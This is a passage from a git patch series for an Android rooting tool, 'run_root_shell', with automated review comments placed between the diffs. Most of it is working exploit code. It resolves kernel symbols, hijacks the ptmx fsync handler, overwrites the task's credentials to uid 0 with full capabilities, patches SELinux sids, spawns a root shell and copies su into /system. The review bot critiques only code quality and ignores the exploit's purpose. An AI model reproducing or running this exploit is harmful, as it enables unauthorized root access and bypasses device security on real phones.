kallsyms_in_memory_lookup_name(info, "ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } + + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); + if (!hint.tty_release_address) { + return false; + } + + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return setup_ptmx_fops_address_in_memory(mem, length, &hint); +} + +static bool +find_variables_in_memory(void *mem, size_t length) +{ + kallsyms *info; + + printf("Search address in memory...\n"); + + info = kallsyms_in_memory_init(mem, length); + if (info) { + printf("Using kallsyms_in_memory...\n"); + + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); + } + + if (!remap_pfn_range) { + remap_pfn_range 
= (void *)kallsyms_in_memory_lookup_name(info, "remap_pfn_range"); + } + + if (!vmalloc_exec) { + vmalloc_exec = (void *)kallsyms_in_memory_lookup_name(info, "vmalloc_exec"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(info, mem, length); + } + } + + kallsyms_in_memory_free(info); + + if (has_all_essential_addresses()) { + return true; + } + } + + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); + + return has_all_essential_addresses(); +} + +static bool +setup_variables(void) +{ + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_remap_pfn_range_address(); + setup_vmalloc_exec_address(); + setup_ptmx_fops_address(); + + if (has_all_essential_addresses()) { + return true; + } + + printf("Try to find address in memory...\n"); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } + + if (has_all_essential_addresses()) { + return true; + } + + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred address.\n"); + } + + if (!commit_creds) { + printf("Failed to get commit_creds address.\n"); + } + + if (!remap_pfn_range) { + printf("Failed to get remap_pfn_range address.\n"); + } + + if (!vmalloc_exec) { + printf("Failed to get vmalloc_exec address.\n"); + } + + if (!ptmx_fops) { + printf("Failed to get ptmx_fops address.\n"); + } + + print_reason_device_not_supported(); + + return false; +} + +static void +register_address(void) +{ +#ifdef HAS_SET_SYMBOL_ADDRESS + printf("Essential address are:\n"); + + if (device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred)) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds)) { + printf(" commit_creds = %p\n", 
commit_creds); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(remap_pfn_range), (unsigned long int)remap_pfn_range)) { + printf(" remap_pfn_range = %p\n", remap_pfn_range); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(vmalloc_exec), (unsigned long int)vmalloc_exec)) { + printf(" vmalloc_exec = %p\n", vmalloc_exec); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops)) { + printf(" ptmx_fops = %p\n", ptmx_fops); + } +#endif /* HAS_SET_SYMBOL_ADDRESS */ +} + +int +get_address(int argc, char **argv) +{ + device_detected(); + + printf("Try without fb_mem_exploit fist...\n\n"); + set_fb_mem_exploit_enable(false); + + if (!setup_variables()) { + printf("\n\n"); + + printf("Try again with fb_mem_exploit...\n\n"); + set_fb_mem_exploit_enable(true); + if (!setup_variables()) { + printf("Failed to setup variables.\n"); + exit(EXIT_FAILURE); + } + } + + register_address(); + + exit(EXIT_SUCCESS); +} +/* +vi:ts=2:nowrap:ai:expandtab:sw=2 +*/ + diff --git a/get_root.c b/get_root.c new file mode 100644 index 0000000..181db20 --- /dev/null +++ b/get_root.c 
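Review bot: `#define _LARGEFILE64_SOURCE` sits after six `#include` lines, so it has no effect: the C library evaluates feature-test macros when its first header is processed, and by then `features.h` has already been pulled in, so any `*64` declarations the define was meant to enable are not guaranteed to be visible. Move it to the very first line of the file (`#define _LARGEFILE64_SOURCE` above the first `#include`), or pass it via `LOCAL_CFLAGS` in Android.mk; the same ordering is copied into `get_root.c` in this commit. Two smaller points: `get_address()` is declared `int` and takes `argc`/`argv` but never reads them and ends every path with `exit()`, so either return the status to the caller or add a comment such as `/* Dispatcher entry point: prints/registers addresses and exits; never returns. */`; and the user-visible string `"Try without fb_mem_exploit fist...\n"` has a typo (`first`). In `find_variables_in_memory()` the result of `find_ptmx_fops_address(info, mem, length)` is discarded — presumably `setup_ptmx_fops_address_in_memory` stores into `ptmx_fops` directly, but a one-line comment saying so would save the reader a trip into ptmx.c.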
@@ -0,0 +1,380 @@ +#include +#include +#include +#include +#include +#include +#define _LARGEFILE64_SOURCE +#include +#include +#include +#include + +#include +#include "device_database.h" +#include "cred.h" +#include "mm.h" +#include "ptmx.h" +#include "libexploit/exploit.h" +#include "libkallsyms/kallsyms_in_memory.h" +#include + +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... 
*/ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; + struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct *security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && 
security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + +void +obtain_root_privilege(void) +{ + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } +} + +static bool +run_obtain_root_privilege(void *user_data) +{ + int fd; + int ret; + + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + + fd = open(PTMX_DEVICE, O_WRONLY); + + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + + close(fd); + + return (ret == 0); +} + +static bool +run_exploit(void) +{ + setup_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + return false; + } + + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&obtain_root_privilege, 0, + run_obtain_root_privilege, NULL); +} + +static bool +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) +{ + find_ptmx_fops_hint_t hint; + + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } + + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); + if (!hint.tty_release_address) { + return false; + } + + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return setup_ptmx_fops_address_in_memory(mem, length, &hint); +} + +bool find_variables_in_memory(void *mem, size_t length) +{ + kallsyms *info; + + printf("Search address in memroy...\n"); + + info = kallsyms_in_memory_init(mem, length); + if (info) { + printf("Using 
kallsyms_in_memroy...\n"); + + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(info, mem, length); + } + } + + kallsyms_in_memory_free(info); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + } + + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); + + return prepare_kernel_cred && commit_creds && ptmx_fops; +} + +bool +setup_variables(void) +{ + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_ptmx_fops_address(); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + + printf("Try to find address in memory...\n"); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + printf(" commit_creds = %p\n", commit_creds); + printf(" ptmx_fops = %p\n", ptmx_fops); + +#ifdef HAS_SET_SYMBOL_ADDRESS + device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); + device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); + device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); +#endif /* HAS_SET_SYMBOL_ADDRESS */ + + return true; + } + + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred address.\n"); + } + + if (!commit_creds) { + printf("Failed to get commit_creds address.\n"); + } + + if (!ptmx_fops) { + printf("Failed to get ptmx_fops address.\n"); + } + + 
print_reason_device_not_supported(); + + return false; +} + +int +get_root(int argc, char **argv) +{ + char* command = NULL; + int i; + for (i = 1; i < argc; i++) { + if (!strcmp(argv[i], "-c")) { + if (++i < argc) { + command = argv[i]; + } + } + } + + device_detected(); + + if (!setup_variables()) { + printf("Failed to setup variables.\n"); + exit(EXIT_FAILURE); + } + + run_exploit(); + + if (getuid() != 0) { + printf("Failed to obtain root privilege.\n"); + exit(EXIT_FAILURE); + } + + if (command == NULL) { + system("/system/bin/sh"); + } else { + execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); + } + + if ((fopen("/data/local/tmp/su", "r")) != NULL){ + system("mount -o rw,remount /system"); + system("cp /data/local/tmp/su /system/xbin"); + system("chmod 644 /system/xbin/su"); + system("mount -o ro,remount /system"); + } + + exit(EXIT_SUCCESS); +} +/* +vi:ts=2:nowrap:ai:expandtab:sw=2 +*/ diff --git a/main.c b/main.c index baab536..2734be1 100644 --- a/main.c +++ b/main.c 
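Review bot: In `get_root`, the `fopen("/data/local/tmp/su", "r")` near the end is only an existence test, yet the returned FILE* is never closed, so the stream and its descriptor stay open across the following `system()` calls and are leaked; `if (access("/data/local/tmp/su", R_OK) == 0) {` makes the same check without opening anything (the file already needs `<unistd.h>` for `execl`/`getuid`, assuming that is one of the includes whose header name was lost in extraction). The `execl` and `system` return values are unchecked, so when `execl` fails the code falls through into the install block and still exits `EXIT_SUCCESS`; at minimum `perror("execl"); exit(EXIT_FAILURE);` belongs right after the `execl`. In `run_obtain_root_privilege`, `open(PTMX_DEVICE, O_WRONLY)` is likewise unchecked: a -1 descriptor makes both `fsync` calls fail with EBADF and the function reports a generic failure, so `if (fd < 0) { perror(PTMX_DEVICE); return false; }` would separate "device not openable" from "attempt had no effect". `get_root` also takes `(int argc, char **argv)` and scans for `-c` starting at `argv[1]`, which only works if the caller forwards main's full argument vector.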
@@ -19,374 +19,35 @@ #include "libkallsyms/kallsyms_in_memory.h" #include -#define THREAD_SIZE 8192 - -#define KERNEL_START 0xc0000000 - -struct thread_info; -struct task_struct; -struct cred; -struct kernel_cap_struct; -struct task_security_struct; -struct list_head; - -struct thread_info { - unsigned long flags; - int preempt_count; - unsigned long addr_limit; - struct task_struct *task; - - /* ... */ -}; - -struct kernel_cap_struct { - unsigned long cap[2]; -}; - -struct cred { - unsigned long usage; - uid_t uid; - gid_t gid; - uid_t suid; - gid_t sgid; - uid_t euid; - gid_t egid; - uid_t fsuid; - gid_t fsgid; - unsigned long securebits; - struct kernel_cap_struct cap_inheritable; - struct kernel_cap_struct cap_permitted; - struct kernel_cap_struct cap_effective; - struct kernel_cap_struct cap_bset; - unsigned char jit_keyring; - void *thread_keyring; - void *request_key_auth; - void *tgcred; - struct task_security_struct *security; - - /* ... */ -}; - -struct list_head { - struct list_head *next; - struct list_head *prev; -}; - -struct task_security_struct { - unsigned long osid; - unsigned long sid; - unsigned long exec_sid; - unsigned long create_sid; - unsigned long keycreate_sid; - unsigned long sockcreate_sid; -}; - - -struct task_struct_partial { - struct list_head cpu_timers[3]; - struct cred *real_cred; - struct cred *cred; - struct cred *replacement_session_keyring; - char comm[16]; -}; - -static inline struct thread_info * -current_thread_info(void) -{ - register unsigned long sp asm ("sp"); - return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); -} - -static bool -is_cpu_timer_valid(struct list_head *cpu_timer) -{ - if (cpu_timer->next != cpu_timer->prev) { - return false; - } - - if ((unsigned long int)cpu_timer->next < KERNEL_START) { - return false; - } - - return true; -} - -static void -obtain_root_privilege_by_modify_task_cred(void) -{ - struct thread_info *info; - struct cred *cred; - struct task_security_struct *security; - int i; - - info 
= current_thread_info(); - cred = NULL; - - for (i = 0; i < 0x400; i+= 4) { - struct task_struct_partial *task = ((void *)info->task) + i; - - if (is_cpu_timer_valid(&task->cpu_timers[0]) - && is_cpu_timer_valid(&task->cpu_timers[1]) - && is_cpu_timer_valid(&task->cpu_timers[2]) - && task->real_cred == task->cred) { - cred = task->cred; - break; - } - } - - if (cred == NULL) { - return; - } - - cred->uid = 0; - cred->gid = 0; - cred->suid = 0; - cred->sgid = 0; - cred->euid = 0; - cred->egid = 0; - cred->fsuid = 0; - cred->fsgid = 0; - - cred->cap_inheritable.cap[0] = 0xffffffff; - cred->cap_inheritable.cap[1] = 0xffffffff; - cred->cap_permitted.cap[0] = 0xffffffff; - cred->cap_permitted.cap[1] = 0xffffffff; - cred->cap_effective.cap[0] = 0xffffffff; - cred->cap_effective.cap[1] = 0xffffffff; - cred->cap_bset.cap[0] = 0xffffffff; - cred->cap_bset.cap[1] = 0xffffffff; - - security = cred->security; - if (security) { - if (security->osid != 0 - && security->sid != 0 - && security->exec_sid == 0 - && security->create_sid == 0 - && security->keycreate_sid == 0 - && security->sockcreate_sid == 0) { - security->osid = 1; - security->sid = 1; - } - } -} - -static void -obtain_root_privilege_by_commit_creds(void) -{ - commit_creds(prepare_kernel_cred(0)); -} - -static void (*obtain_root_privilege_func)(void); - -void -obtain_root_privilege(void) -{ - if (obtain_root_privilege_func) { - obtain_root_privilege_func(); - } -} - -static bool -run_obtain_root_privilege(void *user_data) -{ - int fd; - int ret; - - obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; - - fd = open(PTMX_DEVICE, O_WRONLY); - - ret = fsync(fd); - - if (getuid() != 0) { - printf("commit_creds(): failed. 
Try to hack task->cred.\n"); - - obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; - ret = fsync(fd); - } - - close(fd); - - return (ret == 0); -} - -static bool -run_exploit(void) -{ - setup_ptmx_fops_fsync_address(); - if (!ptmx_fops_fsync_address) { - return false; - } - - return attempt_exploit(ptmx_fops_fsync_address, - (unsigned long int)&obtain_root_privilege, 0, - run_obtain_root_privilege, NULL); +static int print_help(const char* cmd) { + printf("Usage\n"); + printf("> Try privilege escalation:\n"); + printf("%s get_root\n", cmd); + printf("\n"); + printf("> Get symbol address:\n"); + printf("%s get_address\n", cmd); + return 1; } void -device_detected(void) -{ - char device[PROP_VALUE_MAX]; - char build_id[PROP_VALUE_MAX]; - - __system_property_get("ro.product.model", device); - __system_property_get("ro.build.display.id", build_id); - - printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); -} - -static bool -find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) -{ - find_ptmx_fops_hint_t hint; - - hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); - if (!hint.ptmx_open_address) { - return false; - } - - hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); - if (!hint.tty_release_address) { - return false; - } - - hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); - if (!hint.tty_fasync_address) { - return false; - } - - return setup_ptmx_fops_address_in_memory(mem, length, &hint); -} - -bool find_variables_in_memory(void *mem, size_t length) -{ - kallsyms *info; - - printf("Search address in memroy...\n"); - - info = kallsyms_in_memory_init(mem, length); - if (info) { - printf("Using kallsyms_in_memroy...\n"); - - if (!prepare_kernel_cred) { - prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); - } - - if (!commit_creds) { - commit_creds = 
(commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); - } - - if (!ptmx_fops) { - ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); - - if (!ptmx_fops) { - find_ptmx_fops_address(info, mem, length); - } - } +device_detected(void) { + char device[PROP_VALUE_MAX]; + char build_id[PROP_VALUE_MAX]; - kallsyms_in_memory_free(info); + __system_property_get("ro.product.model", device); + __system_property_get("ro.build.display.id", build_id); - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - } - - setup_prepare_kernel_cred_address_in_memory(mem, length); - setup_commit_creds_address_in_memory(mem, length); - - return prepare_kernel_cred && commit_creds && ptmx_fops; + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); + return; } -bool -setup_variables(void) -{ - setup_prepare_kernel_cred_address(); - setup_commit_creds_address(); - setup_ptmx_fops_address(); - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - return true; - } - - printf("Try to find address in memory...\n"); - if (!run_with_mmap(find_variables_in_memory)) { - printf("\n"); - run_with_memcpy(find_variables_in_memory); - } - - if (prepare_kernel_cred && commit_creds && ptmx_fops) { - printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); - printf(" commit_creds = %p\n", commit_creds); - printf(" ptmx_fops = %p\n", ptmx_fops); - -#ifdef HAS_SET_SYMBOL_ADDRESS - device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); - device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); - device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); -#endif /* HAS_SET_SYMBOL_ADDRESS */ - - return true; - } - - if (!prepare_kernel_cred) { - printf("Failed to get prepare_kernel_cred address.\n"); - } +int main(int argc, char **argv) { - if (!commit_creds) { - printf("Failed to get commit_creds address.\n"); - } - - if (!ptmx_fops) { 
- printf("Failed to get ptmx_fops address.\n"); - } - - print_reason_device_not_supported(); - - return false; -} - -int -main(int argc, char **argv) -{ - char* command = NULL; - int i; - for (i = 1; i < argc; i++) { - if (!strcmp(argv[i], "-c")) { - if (++i < argc) { - command = argv[i]; - } + if (argc == 2 && strcmp(argv[1], "get_root") == 0) { + return get_root(); + } else if (argc == 2 && strcmp(argv[1], "get_address") == 0) { + return get_address(); } - } - - device_detected(); - - if (!setup_variables()) { - printf("Failed to setup variables.\n"); - exit(EXIT_FAILURE); - } - - run_exploit(); - - if (getuid() != 0) { - printf("Failed to obtain root privilege.\n"); - exit(EXIT_FAILURE); - } - - if (command == NULL) { - system("/system/bin/sh"); - } else { - execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); - } - - if ((fopen("/data/local/tmp/su", "r")) != NULL){ - system("mount -o rw,remount /system"); - system("cp /data/local/tmp/su /system/xbin"); - system("chmod 644 /system/xbin/su"); - system("mount -o ro,remount /system"); - } - exit(EXIT_SUCCESS); + return print_help(argv[0]); } -/* -vi:ts=2:nowrap:ai:expandtab:sw=2 -*/ From 339e2a49fabd0e12cf844a44baa44cb00388b994 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sat, 4 Jul 2015 13:03:37 +0900 Subject: [PATCH 20/26] updated readme --- README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 0463a05..8564aa1 100644 --- a/README.md +++ b/README.md @@ -47,4 +47,8 @@ Running `adb shell chmod 777 /data/local/tmp/*` * Run the command on the phone: - `adb shell /data/local/tmp/run_root_shell` + If the device is not listed in the database, you will need to run this command at the beginning + `adb shell /data/local/tmp/run_root_shell get_address` + + If you try to privilege escalation, you must run this command + `adb shell /data/local/tmp/run_root_shell get_root` From 80a735a77186a1c7ed03639ebaa6fa9752bf34f0 Mon Sep 17 00:00:00 2001 
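Review bot: `return get_root();` and `return get_address();` in `main` pass no arguments, while the functions this commit defines in get_root.c and get_address.c are declared `int get_root(int argc, char **argv)` and `int get_address(int argc, char **argv)`; with a prototype in scope this is a compile error, and without one it is an implicit declaration that leaves `get_root`'s `-c` loop reading indeterminate `argc`/`argv`. Forwarding the vector, `return get_root(argc, argv);` and `return get_address(argc, argv);`, fixes the mismatch, and since `get_root` starts scanning at `argv[1]` it would then see `-c <cmd>` after the subcommand — but only if the `argc == 2` guard is relaxed to `argc >= 2`. Note also that both callees end in `exit()`, so the `return` of their value is never reached and `print_help` is the only path that actually returns from `main` (status 1, which is appropriate for a usage error). `main` and `print_help` are fully contained in this hunk; the trailing `return;` added to `device_detected` is redundant and can be dropped.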
From: scoty755 Date: Sat, 4 Jul 2015 13:18:55 +0900 Subject: [PATCH 21/26] Exits the loop if the acquisition of the Symbol Address failed --- get_address.c | 1 + 1 file changed, 1 insertion(+) diff --git a/get_address.c b/get_address.c index 7906063..6e2a478 100644 --- a/get_address.c +++ b/get_address.c @@ -201,6 +201,7 @@ int get_address(int argc, char **argv) { device_detected(); + has_all_essential_addresses(); printf("Try without fb_mem_exploit fist...\n\n"); set_fb_mem_exploit_enable(false); From 5675581f34f91d9fa7d5868abe99235de69158a2 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 5 Jul 2015 22:37:24 +0900 Subject: [PATCH 22/26] Revert "Exits the loop if the acquisition of the Symbol Address failed" This reverts commit 80a735a77186a1c7ed03639ebaa6fa9752bf34f0. --- get_address.c | 1 - 1 file changed, 1 deletion(-) diff --git a/get_address.c b/get_address.c index 6e2a478..7906063 100644 --- a/get_address.c +++ b/get_address.c @@ -201,7 +201,6 @@ int get_address(int argc, char **argv) { device_detected(); - has_all_essential_addresses(); printf("Try without fb_mem_exploit fist...\n\n"); set_fb_mem_exploit_enable(false); From 1d2fa33e685e448ae2a84dd27dbbb1e2fbd36747 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Mon, 20 Jul 2015 21:39:56 +0900 Subject: [PATCH 23/26] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index 7f1c97f..d936bcc 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 7f1c97fa1f85b5a7678fc81ad6f0f81a8322a031 +Subproject commit d936bcc43edf3054a07945326d5fedb393e36c29 From 5ab1afbb65faaf7d8a42d523e6c99413b2bda615 Mon Sep 17 00:00:00 2001 
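Review bot: The added `has_all_essential_addresses();` in `get_address` discards its return value, so it changes nothing about control flow and the early exit the subject line describes does not happen; as written the call is pure overhead. If the intent is to skip the search when the addresses are already known, the result has to be tested, e.g. `if (has_all_essential_addresses()) { register_address(); exit(EXIT_SUCCESS); }`, and that test only makes sense after the `setup_*_address()` calls that populate the globals, which here run later inside `setup_variables()` (assuming nothing before this point fills them). The body of `get_address` continues outside the hunk.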
From: scoty755 Date: Fri, 16 Oct 2015 00:53:00 +0900 Subject: [PATCH 24/26] Change the get method of the symbol address --- Android.mk | 1 - get_address.c | 12 +- get_root.c | 380 ------------------------------------------------- main.c | 384 +++++++++++++++++++++++++++++++++++++++++++++++--- 4 files changed, 369 insertions(+), 408 deletions(-) delete mode 100644 get_root.c diff --git a/Android.mk b/Android.mk index 8c474f7..049f757 100644 --- a/Android.mk +++ b/Android.mk @@ -5,7 +5,6 @@ include $(CLEAR_VARS) LOCAL_SRC_FILES := \ cred.c \ get_address.c \ - get_root.c \ kallsyms.c \ main.c \ mm.c \ diff --git a/get_address.c b/get_address.c index 7906063..4e1d4e9 100644 --- a/get_address.c +++ b/get_address.c @@ -164,8 +164,6 @@ setup_variables(void) printf("Failed to get ptmx_fops address.\n"); } - print_reason_device_not_supported(); - return false; } @@ -197,11 +195,9 @@ register_address(void) #endif /* HAS_SET_SYMBOL_ADDRESS */ } -int -get_address(int argc, char **argv) +bool +get_address(void) { - device_detected(); - printf("Try without fb_mem_exploit fist...\n\n"); set_fb_mem_exploit_enable(false); @@ -212,13 +208,13 @@ get_address(int argc, char **argv) set_fb_mem_exploit_enable(true); if (!setup_variables()) { printf("Failed to setup variables.\n"); - exit(EXIT_FAILURE); + return false; } } register_address(); - exit(EXIT_SUCCESS); + return true; } /* vi:ts=2:nowrap:ai:expandtab:sw=2 diff --git a/get_root.c b/get_root.c deleted file mode 100644 index 181db20..0000000 --- a/get_root.c +++ /dev/null 
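Review bot: `get_address()` now returns `bool` with `true` meaning success, where it previously called `exit(EXIT_SUCCESS)`/`exit(EXIT_FAILURE)`; if `main` still does `return get_address();` as in the earlier main.c hunk, a successful run exits with status 1 and a failure with 0, the reverse of what a caller such as the README's adb invocation would expect, so the caller should map it, `return get_address() ? EXIT_SUCCESS : EXIT_FAILURE;`. This commit's main.c hunk runs past the end of the visible page, so I cannot confirm how the result is consumed. The `@@ -164,8 +164,6 @@` hunk removes `print_reason_device_not_supported()` from `setup_variables`'s failure path, so a user now sees only the per-symbol "Failed to get ... address." lines without the device-support explanation, and the `@@ -197,11 +195,9 @@` hunk drops `device_detected()` from `get_address` — both are fine only if `main` now performs them before dispatching, which is again outside the visible hunk. `setup_variables`'s body starts and ends outside its hunk.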
@@ -1,380 +0,0 @@ -#include -#include -#include -#include -#include -#include -#define _LARGEFILE64_SOURCE -#include -#include -#include -#include - -#include -#include "device_database.h" -#include "cred.h" -#include "mm.h" -#include "ptmx.h" -#include "libexploit/exploit.h" -#include "libkallsyms/kallsyms_in_memory.h" -#include - -#define THREAD_SIZE 8192 - -#define KERNEL_START 0xc0000000 - -struct thread_info; -struct task_struct; -struct cred; -struct kernel_cap_struct; -struct task_security_struct; -struct list_head; - -struct thread_info { - unsigned long flags; - int preempt_count; - unsigned long addr_limit; - struct task_struct *task; - - /* ... */ -}; - -struct kernel_cap_struct { - unsigned long cap[2]; -}; - -struct cred { - unsigned long usage; - uid_t uid; - gid_t gid; - uid_t suid; - gid_t sgid; - uid_t euid; - gid_t egid; - uid_t fsuid; - gid_t fsgid; - unsigned long securebits; - struct kernel_cap_struct cap_inheritable; - struct kernel_cap_struct cap_permitted; - struct kernel_cap_struct cap_effective; - struct kernel_cap_struct cap_bset; - unsigned char jit_keyring; - void *thread_keyring; - void *request_key_auth; - void *tgcred; - struct task_security_struct *security; - - /* ... 
